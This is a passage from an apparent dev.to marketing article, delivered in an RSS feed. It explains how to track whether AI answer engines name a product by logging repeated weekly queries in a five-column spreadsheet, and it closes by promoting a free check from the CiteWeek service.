&lt;p&gt;The second answer is the one people skip, and it's the more useful one. The&lt;br&gt;
list the model produces instead of you is your real competitive set. In my&lt;br&gt;
own category checks so far the named alternatives have been listicles and&lt;br&gt;
comparison posts more often than the products my positioning page worries&lt;br&gt;
about (hypothesis from a handful of informal runs, not a measured sample).&lt;/p&gt;

&lt;p&gt;Write down date, query, engine, named Y/N, and cited-instead domain. Five&lt;br&gt;
columns in a spreadsheet. That spreadsheet is the whole instrument. A $399&lt;br&gt;
dashboard is, at its top line, a prettier and more continuous version of&lt;br&gt;
those five columns plus some alerting.&lt;/p&gt;

&lt;h2&gt;
  
  
  One run is an anecdote
&lt;/h2&gt;

&lt;p&gt;LLM answers are non-deterministic. Ask the same question twice and you can&lt;br&gt;
get two different brand lists, which is exactly why "I asked once and I'm in&lt;br&gt;
there" is not a finding. My working rule is 3-5 runs per query per week and&lt;br&gt;
recording the majority answer. That's a hypothesis about a usable cadence,&lt;br&gt;
not a validated method; the weekly cohorts we're running are what will tell&lt;br&gt;
me whether mention frequency over N runs actually tracks anything a buyer&lt;br&gt;
sees.&lt;/p&gt;

&lt;p&gt;The weekly rhythm matters for a second reason. You can't change the model&lt;br&gt;
directly. You publish something, wait, and re-probe. The feedback loop is a&lt;br&gt;
week long no matter how often you check, so daily anxiety buys you nothing&lt;br&gt;
that a weekly grid doesn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the grid can't tell you
&lt;/h2&gt;

&lt;p&gt;Being named is a binary, and binary metrics flatter you. "You're mentioned"&lt;br&gt;
covers both "the cheap alternative to Y" and "the category standard". Only&lt;br&gt;
one of those framings helps you, and no citation tracker I've seen scores&lt;br&gt;
framing (if yours does, I want to see the methodology).&lt;/p&gt;

&lt;p&gt;The grid also measures the logged-out, default-model answer. A buyer with&lt;br&gt;
chat history and different settings can see something else entirely. Treat&lt;br&gt;
your grid as the baseline case, not the buyer's exact experience.&lt;/p&gt;

&lt;p&gt;And a good mention rate doesn't tell you what to do next. That comes from&lt;br&gt;
reading the sources the answer leans on: which comparison pages, which&lt;br&gt;
listicles, which threads. The fix for a weak result is almost always one&lt;br&gt;
publishable artifact, like an honest comparison page or a tested-it-myself&lt;br&gt;
post. That's a content task with a weekly cadence, not a dashboard&lt;br&gt;
subscription.&lt;/p&gt;

&lt;h2&gt;
  
  
  If the result is bad
&lt;/h2&gt;

&lt;p&gt;Bad result, meaning you're absent and a competitor is named: read the&lt;br&gt;
sources behind the answer and publish the artifact they'd cite. A comparison&lt;br&gt;
page is the highest-yield start because it's the artifact buyers' questions&lt;br&gt;
map onto. Then re-probe next week and see if the answer moved. If it didn't&lt;br&gt;
after a few honest attempts, you've learned something about how far content&lt;br&gt;
alone gets you in your category, which is worth knowing before you rent a&lt;br&gt;
$399 dashboard to watch it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The free check
&lt;/h2&gt;

&lt;p&gt;That five-column grid is exactly what CiteWeek runs for you weekly: three&lt;br&gt;
buyer-language queries across ChatGPT, Perplexity and Google AI Overviews,&lt;br&gt;
one email with named/cited-instead, and one article worth publishing. The&lt;br&gt;
free check runs the grid once so you can see the shape of the data before&lt;br&gt;
paying for anything. It's 3 checks per email per 14 days, no card, results&lt;br&gt;
on the page:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://citeweek.capyempire.com/?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-1-does-chatgpt-recommend-you&amp;amp;utm_content=cta_button" rel="noopener noreferrer"&gt;Run the free check&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When you repost or syndicate this, set utm_source to wherever it ran&lt;br&gt;
(&lt;code&gt;devto&lt;/code&gt; | &lt;code&gt;medium&lt;/code&gt; | &lt;code&gt;indiehackers&lt;/code&gt; | …) and keep utm_campaign as&lt;br&gt;
article-1-does-chatgpt-recommend-you. That's how signups get attributed back&lt;br&gt;
to this article in the funnel table, and I'd rather learn which articles work&lt;br&gt;
from tagged links than from vibes.&lt;/p&gt;

</description>
      <category>saas</category>
      <category>chatgpt</category>
      <category>marketing</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
